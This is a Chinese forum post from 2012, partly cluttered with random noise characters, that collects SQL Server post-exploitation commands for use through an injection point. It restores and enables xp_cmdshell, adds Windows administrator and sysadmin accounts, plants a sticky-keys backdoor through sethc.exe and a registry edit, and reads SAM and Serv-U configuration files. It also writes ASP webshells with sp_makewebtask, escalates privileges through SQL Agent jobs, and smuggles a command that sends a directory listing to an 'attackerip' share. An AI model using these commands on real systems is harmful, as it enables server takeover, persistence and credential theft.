1 未能找到存储过程'master..xpcmdshell'. EXEC master.dbo.sp_addextendedproc 后用下面的三种方法,在注入点上执行加个空格和;号
; h D2 ^- P" O {* k/ ~恢复方法:查询分离器连接后,
; Z& ?- B; ~. C) u) L) M第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
+ S9 T- v# c' O: ?第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
( _# _! `! h/ ?, m. ~) `( t然后按F5键命令执行完毕
7 R2 y& L8 Q# m' @' Y4 [0 l1 z: A5 Y2 [
% l6 M: a3 U# X1 ^( x2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)8 p& v( J: w* u# l
恢复方法:查询分离器连接后,' L) z7 f+ ^$ Q6 Q7 f7 i
第一步执行:EXEC master.dbo.sp_dropextendedproc "xp_cmdshell": D) S u* |( I0 h
第二步执行:EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
1 Q0 Y5 T* I" \2 I+ v! A$ i然后按F5键命令执行完毕, B. u( V1 N2 T9 W3 f" H
2 S2 q1 a4 y3 t* E
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
+ z; p, _6 O8 u1 O恢复方法:查询分离器连接后,
8 ^& |0 [9 I- E1 x0 X第一步执行:exec sp_dropextendedproc 'xp_cmdshell'; i$ n `2 K9 L; g; z4 C: p L7 I" N
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' 1 c" T0 {2 k& F! V e& z
然后按F5键命令执行完毕
' u# D1 x ~+ v; M: r$ d, N2 \5 p4 V/ p- O$ d: E
4 终极方法.
8 ]9 a! M6 f6 i如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
5 p7 R" b% R- q& s0 N% R查询分离器连接后,) a9 v- }! N2 F
2000servser系统:
( K: O0 g; d; X |& Ideclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'5 X1 Y3 h5 d: s) {2 o3 ~
5 P, `9 `2 _+ d( u! bdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'$ l2 u: O' U! l+ h; @4 b5 E
' W, ?! j9 ?0 R& s. {7 m! \2 K5 Dxp或2003server系统:. c- |, l- l! H! M9 ]3 e& j" Q
9 y- M. E5 S) l1 I
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'
! r( G1 L; p# S# `5 C, U
' l0 E# @% r" B- f9 Y( W, q5 @4 edeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'0 S: L B3 I* b. @ ~: o1 Y, O
8 S; p( L7 v, ^* n
9 s# o4 m3 n' I, k5 Y9 K( M6 `
五个SHIFT
0 s; u K: O. F. tdeclare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';6 t, K0 L) X- c5 c7 e
" ]5 E! U8 `, x. W; X
declare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe'; - K3 K: L; Y* z9 S! l+ M4 G" T
. j$ x: @$ e# a5 t
xp_cmdshell执行命令另一种方法: E: U- l9 c9 l, M! `
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add' + E0 P9 `3 f v; T' g
$ P7 i& Z6 E! s/ B
判断存储扩展是否存在
1 q: J4 H8 ~, \4 ^Select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
& O1 f; K! |3 t" W ?- ~0 ?2 Q返回结果为1就OK
p* s) f$ x: f$ [% i b3 I, S, O6 v) C- L
2 F6 p, Z" Z- f7 D$ H. ^8 O. M3 u
上传xplog70.dll恢复xp_cmdshell语句:3 h: ~8 S" O& _
sp_addextendedproc xp_cmdshell,@dllname='E:\newche2\about\XPLOG70.DLL'1 d: |- L% v% E( z
C, ]6 g% C7 s" B5 m) p3 L7 h4 I$ g
否则上传xplog7.0.dll
; |, x, _3 X# D3 r: WExec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll'# r- o2 x' n% v( U, a9 `
# q2 V% }; K: }8 ~& X- ~( S: Q+ [# ]1 Q! Q1 {8 N9 L$ x8 G/ `! z
9 o% V3 g' p+ E+ H$ D
首先开启沙盘模式:
9 ?* _7 [% S* T o" M1 e, ~" kexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1$ F) y* t0 }' n' ?# P9 m
6 ]8 e' q6 h. {) ~, l- x. Z$ F7 n, o然后利用jet.oledb执行系统命令
5 o" y+ I/ v$ `8 [5 |: ?, kselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")'), V& I; s1 F# Y L
返回 不能找到c:\windows\system32\ias\ias.mdb错误,用exec master..xp_dirtree 'c:\windows\system32\ias\ias',1,1-- 发现c:\windows\system32\ias\ias.mdb没了,应该是被管理员删掉了,还有另一个mdb也没了: P* z, a% x( m! Q/ G0 K+ g
4 n- _ @, A0 N& f1 s6 Y/ F- E
5 H% f8 G& E5 y! q( B+ V n* R3 E9 D& T- R; g5 _) l! ?3 x0 L1 L5 b
恢复过程sp_addextendedproc 如下:
2 O( |9 y$ o& g! o( o& screate procedure sp_addextendedproc --- 1996/08/30 20:13 & q. Y1 K4 f j; U
@functname nvarchar(517),/* (owner.)name of function to call */
, V+ u. o& c _3 C, i: D@dllname varchar(255)/* name of DLL containing function */ # N- X U1 v2 U8 B
as
& w4 O( }% ]8 _. e8 n Zset implicit_transactions off
& G) G2 P6 ?( a' C) gif @@trancount > 0
1 Q7 v. |' g! Y" W% Mbegin
/ B) g, a# L0 G3 z$ ?0 Y: c& P) Nraiserror(15002,-1,-1,'sp_addextendedproc')
/ O! D9 }% F& A2 _9 }0 O! V* e: |return (1)
7 P/ s* d) }! [. k, O& I, eend - b# v# S- i+ P* {3 c$ o4 X2 ~" q) o
dbcc addextendedproc( @functname, @dllname)
( L+ U, X( s2 N# F7 e8 x' _return (0) -- sp_addextendedproc
1 H1 D m5 ^' |! |7 oGO
0 V; V9 Y% k* A+ T+ E
* Y6 X* x* M; o( u! ^, E# Z" `, G+ o8 T
0 _0 o/ {- O. S$ H! A* z导出管理员密码文件
1 Y ?" y( S) ^+ p/ Tsa默认可以读sam键.应该。
! O0 M0 O2 |0 ~$ Creg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg l& k2 O1 S ~, d% z* x
net user administrator test" a/ I' A1 ^: w% i
用administrator登陆." s$ d& ]/ d, F2 [9 G
用完机器后5 k3 F: }" W$ B; w+ c
reg import c:\test.reg* W; Z, Q6 e0 l% n$ z# C* Z
根本不用克隆.( F A1 j: B* k) o# r
找到对应的sid. # j$ \0 W: ^$ n6 z0 b+ w! E8 s; i
! [4 Q8 I1 I1 R) ^2 ?
7 i/ C' a2 s# H, I. I
, N4 l, l5 l2 ~( J) l$ ^" _) b; a恢复所有存储过程
: }5 e1 A, E4 |% U$ b' N- Huse master
- ~. I. @; B. T, B: P3 G1 yexec sp_addextendedproc xp_enumgroups,'xplog70.dll'
% t- b- U. t2 vexec sp_addextendedproc xp_fixeddrives,'xpstar.dll' - X3 _1 W: `( x2 H' [& Y
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
4 i" @2 p2 D8 C2 Texec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll' 3 v$ R* D# l1 v/ [
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
! }3 {) r( [$ |& A( S+ s7 Kexec sp_addextendedproc sp_OACreate,'odsole70.dll' : S5 x, d! B/ i$ O5 L. b$ y* c
exec sp_addextendedproc sp_OADestroy,'odsole70.dll' ! v. T8 d4 t8 G& {: y% z
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
9 x/ \ X( Y9 t1 Z# k# z# d. e% Bexec sp_addextendedproc sp_OAGetProperty,'odsole70.dll' , A& ]3 u2 @+ ]
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
5 I3 q) L! f5 m# f2 m% Zexec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
! U0 X& }( L" _9 z6 F+ M; }exec sp_addextendedproc sp_OAStop,'odsole70.dll' + Z4 o/ G2 g3 k
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
* @: _" N4 W5 S/ ~% ]8 D( Nexec sp_addextendedproc xp_regdeletekey,'xpstar.dll' 0 I3 s/ @+ P, F$ d9 A3 K' H
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll' # E8 h+ r; }" s+ o5 O
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
, M6 {" S+ m; m8 [5 m# j; D/ A' h9 fexec sp_addextendedproc xp_regread,'xpstar.dll'
, v5 n, e) T {& W2 V7 u: S5 Nexec sp_addextendedproc xp_regremovemultistring,'xpstar.dll' 0 j3 y2 m# I& p1 Z$ C
exec sp_addextendedproc xp_regwrite,'xpstar.dll' % M4 z" D3 _( H W
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
6 ]$ C. x7 X7 m- d
: K% m8 I1 J. G) f8 I$ h% I8 C' r
$ B; K9 K, d/ p建立读文件的存储过程( Y1 f0 y/ Q' B0 O5 k% U
Create proc sp_readTextFile @filename sysname
/ [% I* D* I$ o' V! Was4 J1 ?0 R9 E3 N" O
* F+ V2 j. }) G5 P4 [
begin " B0 G6 @, x% ~0 |! i. ^4 c
set nocount on
8 [, ?+ l8 }3 d7 h0 @( \; A, u Create table #tempfile (line varchar(8000))* `# a% |4 C9 f8 h1 ?
exec ('bulk insert #tempfile from "' + @filename + '"')
* F. u( x( a4 g8 I! k- M) L8 k select * from #tempfile
& b7 ]3 `1 i3 K9 G/ C: C drop table #tempfile
8 D! B( b) C* H8 u! y S$ Q( k, _( YEnd$ @/ y1 v! S5 e% h- W/ P
" N2 ~4 b. V- i, x( K% x4 {- yexec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp' 利用建立的存储过程读文件1 Z) l; B: j& t5 s+ G7 c+ e
查看登录用户
' F% h5 Z1 _; |- |/ rSelect * from sysxlogins
) I ]5 z7 b/ Z' x g6 n% c- I x7 C4 s( |8 E
把文件内容读取到表中( |8 w. c: I; D( p8 @) G6 m
BULK INSERT tmp from "c:\test.txt"4 l9 `5 ?7 H/ ?: T
dElete from 表名 清理表里的内容
" c' y4 \4 ~5 B: f0 q6 I; [create table b_test(fn nvarchar(4000));建一个表,字段为fn
3 L5 P% _+ A# z: a2 L1 g/ B7 x, L+ L+ D
e: D$ T( s% p' G; l+ H
加sa用户, b, U+ o. S5 d4 o6 t
exec master.dbo.sp_addlogin user,pass;
2 ?* }4 d4 ~$ {" _exec master.dbo.sp_addsrvrolemember user,sysadmin
$ X E% ?" [; J$ P" b, Q) s# N7 m4 o7 d1 \( x
( ?* [- k+ w/ v8 V9 S9 R9 Y
* Z |. m/ m1 `, H7 L读文件代码
+ l% @* C" m. tdeclare @o int, @f int, @t int, @ret int
7 t1 _, Z6 d/ {: Q5 h5 q; Gdeclare @line varchar(8000): S) c$ z' E: t3 u L \
exec sp_oacreate 'scripting.filesystemobject', @o out1 {4 F( ^3 N. w: G8 P
exec sp_oamethod @o, 'opentextfile', @f out, '文件名', 1
& Q9 h$ v& q X' Eexec @ret = sp_oamethod @f, 'readline', @line out
5 [. k& J# T! r, kwhile( @ret = 0 )
8 A- I, r. d+ p4 p6 N, Pbegin" O4 s0 k0 z( k6 W
print @line
& h" y2 p" x6 |% u Y/ R% b [- m; eexec @ret = sp_oamethod @f, 'readline', @line out" `- n# M/ q9 {. {
end
) M3 h( e6 C: K! {
8 d9 B1 \. b+ P1 r
/ t2 ~7 Q9 e4 D* J, ]; k2 i, u4 v/ Y写文件代码:
# }0 q+ q* b o6 i( w. Z' o9 B* jdeclare @o int, @f int, @t int, @ret int
) Y7 g" b$ ^" k2 F/ S8 ^9 Dexec sp_oacreate 'scripting.filesystemobject', @o out" e* ^' O7 K6 F& T
exec sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 1) g9 u- W, h9 o; W9 f4 N5 O
exec @ret = sp_oamethod @f, 'writeline', NULL, 《内容》
$ g% i1 B ~: o6 I. e% P. G$ L5 d" \7 O& g% h, P6 }; S
9 N8 L: W4 v$ ~添加lake2 shell; l( C1 ]; Y4 X
sp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll' Q- f$ u' j8 L! X( a
sp_dropextendedproc xp_lake2: C+ L9 ~2 b& R/ S$ k( X! i# W2 r
EXEC xp_lake2 'net user', o% W4 F9 y0 x7 B0 [0 o
0 ^2 P% K9 B% i# o) Q" i' E+ p2 d5 C( J0 }( Z6 C+ \' C
得到硬盘文件信息 ) s* w6 `4 R/ t/ E* H u
--参数说明:目录名,目录深度,是否显示文件 3 Z6 b0 G" y V. X
execute master..xp_dirtree 'c:' ' x# j, R7 u7 C3 O
execute master..xp_dirtree 'c:',1
6 Y! s1 | h+ @execute master..xp_dirtree 'c:',1,1 $ k A: g- ^) U9 T
% R2 r7 ^5 r6 Z2 ]4 p+ K( l, H. y1 z, @' i7 j
读serv-u配置信息6 f6 C/ U9 z) U( _5 P ]' Y. a
exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ReadMe.txt'
4 P) `8 L7 C1 B: U8 E/ Y8 rexec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini'
7 N$ B: b9 B0 T
A# L, E+ f4 u/ g% h# G% N l通过xp_regwrite写SHIFT后门
" t6 k2 j; G$ X- j+ q! t4 c' N' _9 yexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--
/ |1 |+ W, e3 d1 a) V R* ^$ L( F- i/ _& s9 w0 D: k& |6 q
2 i F( j% x$ l3 {- t( j z. N0 ~
2 D1 |( m2 k! [. d& O找到web路径然后用exec master.dbo.xp_subdirs 'd:\web\www.xx.com';. H7 K0 k9 E; k2 g
exec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select''<%execute(request("SB"))%>'' '备 份一个小马就可以了
# }3 s: \) l o1 d+ v
. [& e. g) {: IEXECUTE sp_makewebtask @outputfile = ‘WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'
}$ g6 |3 H! w }
6 }8 z- D$ E8 G. w5 b% n/ `; X1 F) Y% T7 t% }* C' h) c- l8 c
% g' K+ D) b9 H# G8 isql server 2005下开启xp_cmdshell的办法9 w* g' A1 x( A
/ I) Q5 U! \/ C3 PEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;' B; G8 s: Q$ C) h. N
* M/ @/ @ w( d, X# w
SQL2005开启'OPENROWSET'支持的方法:
4 r. p" g! ^! P. `' O4 G
& ?7 Z* \$ |/ b/ G/ Y1 @- Q# |/ k2 {exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;
9 n" e( h" v2 R- f: w( O
4 T& y; | _) _- E9 q& o" ?3 n+ _ @SQL2005开启'sp_oacreate'支持的方法:
9 ?6 o4 u9 T# b# ]* ]" `& U" ]# N5 g3 P5 M3 e
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
- M6 D* A1 C3 E1 x! g# G, i8 D4 \# k, ?) a: U% T
4 l/ X7 b0 K0 @. h
4 {# J3 J9 u, \( C
8 [& u8 l. v5 q& [% v/ @% }9 c" Y
/ J2 g' }& N/ l8 F
) m* @ c& I! {2 _' p$ l Q* c* R' w6 y) U# k2 P% Z* X v; G
' u( n$ e& i$ z1 H
0 T* m2 r: Z- S" \) L& I% K9 i& ?1 h6 ^7 o7 M y: F% O; Q
+ [- b' E9 i* |0 `( Z
. Q' I9 g0 n/ @/ [
9 x& e$ p8 j: B. I1 H c( p2 q+ N) u( v6 l* N W
8 ^ r, |8 U% p( k
. M, }1 O; w# Q0 J$ W5 y- ^
4 k' t, i8 ~( A, |3 ?+ g" H: |' S/ H2 W/ f/ n" b9 ]/ C
9 C, G1 i: X- u8 Z' T7 m& a( i
; x% x+ ]6 ^4 B) S
4 Z& v; ~1 W5 m& z) ^4 {) ^, b( \
% h# d* Y: E. S) [1 r/ ?) N1 L
以下方面不知道能不能成功暂且留下研究哈:
* r, V! @8 ?+ A( a4 \( X- ~4)# c8 m' ^, s. C9 |8 @! n/ T
use msdb; --这儿不要是master哟: p6 D. Y4 \* N% t% e! J1 Q
exec sp_add_job @job_name= czy82 ;
5 d+ ~' C. P0 Y9 I, {exec sp_add_jobstep @job_name= czy82 ,@step_name = Exec my sql ,@subsystem= CMDEXEC ,@command= dir c:\>c:\b.txt ;
) ?, T1 l4 Z! W' }exec sp_add_jobserver @job_name = czy82 ,@server_name = smscomputer ;
& g2 A& p+ Z! `3 N; z ]exec sp_start_job @job_name= czy82 ;
9 r+ j0 U+ ~3 L9 a; a# N( E
: T: h( E+ y. V0 g1 t0 s) _利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql,后面的我们就可以. Z9 I8 B: g% s* w5 }6 G) R
执行tsql语句了.) i( T! ?2 W8 f* G! _
对于这几个储存过程的使用第一在@server_name我们要指定你的sql的服务器名5 d9 s1 u* f, T3 N
第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧)
# v3 Y6 ~" h( |0 X/ _; Nnet start SQLSERVERAGENT
. |% q& K# ]: g6 m) [
2 o0 i! C0 p& ]/ h对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的
- I- p2 g5 u+ Y1 ?8 lUSE msdb1 i( z$ `/ W4 o$ T( ~) _
EXEC sp_add_job @job_name = GetSystemOnSQL ,
, F# j9 N7 P4 f" r8 G@enabled = 1,* W" [3 g) k2 j7 g5 C
@description = This will give a low privileged user access to
1 X- K6 g9 [$ I2 ]4 |0 zxp_cmdshell ,3 p; ~$ m; S3 R) c: C( t
@delete_level = 1$ J8 J6 w% o4 @$ Q8 a
EXEC sp_add_jobstep @job_name = GetSystemOnSQL ,& x0 l2 H4 O; |" B$ z
@step_name = Exec my sql ,
, }1 t# ]2 ^3 Z2 M" k# `@subsystem = TSQL ,* a" m9 L/ r( C5 e
@command = exec master..xp_execresultset N select exec
6 ~, O- f' h' V9 G" ?3 ^master..xp_cmdshell "dir > c:\agent-job-results.txt" ,N Master
4 }- h4 e) V; p9 KEXEC sp_add_jobserver @job_name = GetSystemOnSQL ,- F: @1 o$ U8 Z; {" n$ h; E
@server_name = 你的SQL的服务器名 . W+ F: c( b. V6 e6 d P3 X
EXEC sp_start_job @job_name = GetSystemOnSQL
+ v0 e% U. G2 Y2 _" O& H7 W7 @; w0 o
不要怀疑上面的代码,我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以
& T: M! n, B9 s1 N( p1 C" B才让我们可以以public执行xp_cmdshell6 g" g5 A! n9 I. O% U
, k# x% k x4 Q% V1 u) p5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以)# E3 J, o2 F8 h* s! o
在安焦有文章:http://www.xfocus.net/vuln/vul_view.php?vul_id=2968+ ^- n) C+ k' u4 O, N' i9 b3 Y3 E1 W
" ^! V! _! p) E
USE msdb- l/ W: P+ S, u5 j. m+ c0 y
EXEC sp_add_job @job_name = ArbitraryFilecreate ,2 ~0 B% K" o, e1 f! |# R
@enabled = 1,
! }1 P) B. {: A. ?" h' M, R6 y Q- J@description = This will create a file called c:\sqlafc123.txt , P4 P) Z- U& u" N7 @( g3 V
@delete_level = 1
' _; e8 @- T7 `8 k% |: l5 MEXEC sp_add_jobstep @job_name = ArbitraryFilecreate ,; W% M5 h, Q( {: I7 n
@step_name = SQLAFC ,
) n! \+ [( d0 y( F# {2 c# Q@subsystem = TSQL ,! e- p0 k) b2 m7 M4 l: `
@command = select hello, this file was created by the SQL Agent. ,
. Z: R, u1 y6 h$ ?@output_file_name = c:\sqlafc123.txt
- f7 d* I+ }8 }! }/ @' H5 dEXEC sp_add_jobserver @job_name = ArbitraryFilecreate ,! g2 g; o+ n# n+ Q8 f
@server_name = SERVER_NAME * X' X$ k0 s# D8 O, P6 H
EXEC sp_start_job @job_name = ArbitraryFilecreate Q/ @& ~: M- e/ D9 d8 k
$ T+ A" y# d4 ] M. F; W( |
如果subsystem选的是:tsql,在生成的文件的头部有如下内容+ w+ J: D+ B7 E7 ?8 q
4 O& C. P, g& y/ U! J??揂rbitraryFilecreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:19
- c# i3 g" x# j2 k S( B----------------------------------------------
) m4 p L4 y8 `+ R" [hello, this file was created by the SQL Agent., X+ |8 `0 V# P" X5 p/ x4 R
! q+ I0 p. P t2 v(1 ?????)
. c; d3 w% o- S, ^/ _2 I
8 \) G2 _, {+ ~0 ?. ~0 b' h所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员0 h# R/ z4 X* P1 U' J" x. [
命令的vbs文件到启动目录!
7 H2 Q& L# S. }" l% |
. {* _$ X* z4 Y3 O; @' `$ {6)关于sp_makewebtask(可以写任意内容任意文件名的文件)
& o6 P4 u1 u. s8 t关于sp_MScopyscriptfile 看下面的例子; L; u* t7 r7 e: u$ i* N( ^
declare @command varchar(100)
! W+ e: C5 _& f, Tdeclare @scripfile varchar(200)
: Y; a& V) |# ?% M3 n; ]7 k& K3 Lset concat_null_yields_null off
5 } N2 f$ _8 bselect @command= dir c:\ > "\\attackerip\share\dir.txt" ' {3 _, i$ [, s. s$ W9 |( Y$ y
select @scripfile= c:\autoexec.bat > nul" | @command | rd " ( E, B7 G$ `/ j# A7 O
exec sp_MScopyscriptfile @scripfile ,
/ _7 Z' q+ P& S7 F$ J+ `, c; _9 Y% `! J
这两个东东都还在测试试哟3 I! p( j* H3 E+ p: m" v6 s
让MSSQL的public用户得到一个本机的web shell 5 e: d4 }& Y1 }; F% |! m
' V7 N) g5 c% o8 J$ {: d
sp_makewebtask @outputfile= d:\sms\a.asp ,@charset=gb2312,
8 B+ @. b3 Y" M8 b--@query= select <img src=vbscript:msgbox(now())>
8 S. B7 B: m, R--@query= select <%response.write request.servervariables("APPL_PHYSICAL_PATH")%>
8 N7 P/ C: ?$ i5 k7 W, c. Q+ _@query= select
8 s: W# A- d9 S<%On Error Resume Next
% c$ o- `3 ? W3 p; \Set oscript = Server.createObject("wscript.SHELL") 3 K2 s( }/ O5 z! t4 D
Set oscriptNet = Server.createObject("wscript.NETWORK")
: v: X1 k! [+ X6 K' SSet oFileSys = Server.createObject("scripting.FileSystemObject")
- q9 b6 A' q) H( r9 FszCMD = Request.Form(".CMD")
% R) K6 B2 G! q7 B4 A8 F( M7 a1 RIf (szCMD <>"")Then
6 ?/ k5 r& F8 F0 t' S0 O2 g, wszTempFile = "C:\" & oFileSys.GetTempName()
4 g8 y1 _1 J8 E& s. I4 r0 \Call oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) 3 M+ k5 U9 T( f, O8 c* O
Set oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0) e$ J, Q2 ^- m L3 C/ |
End If %>
) H" y# e( U5 M; e& X- I<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method=" OST"> ) B, s& k5 A% \* U& _' i
<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run"> 1 q+ u/ T7 b4 i* c7 `, c
</FORM><RE> * g+ V0 [" |3 K5 G, i2 P1 x
<% If (IsObject(oFile))Then % c, F+ q, P9 m! K& p S: u* @
On Error Resume Next
! s. m8 y( }% c I* x& x+ ZResponse.Write Server.HTMLEncode(oFile.ReadAll)
2 z* k, ?& O* U$ l2 IoFile.Close $ ~8 N; E& N5 ?/ u0 v& e+ l
Call oFileSys.deleteFile(szTempFile, True) ) ^* C5 U5 q3 J+ } R2 `+ R
End If%>
, M. O& Q' J2 e6 _</BODY></HTML>
! B7 C) q) c3 H |
发表于 2012-9-15 14:37:30
收藏
支持
反对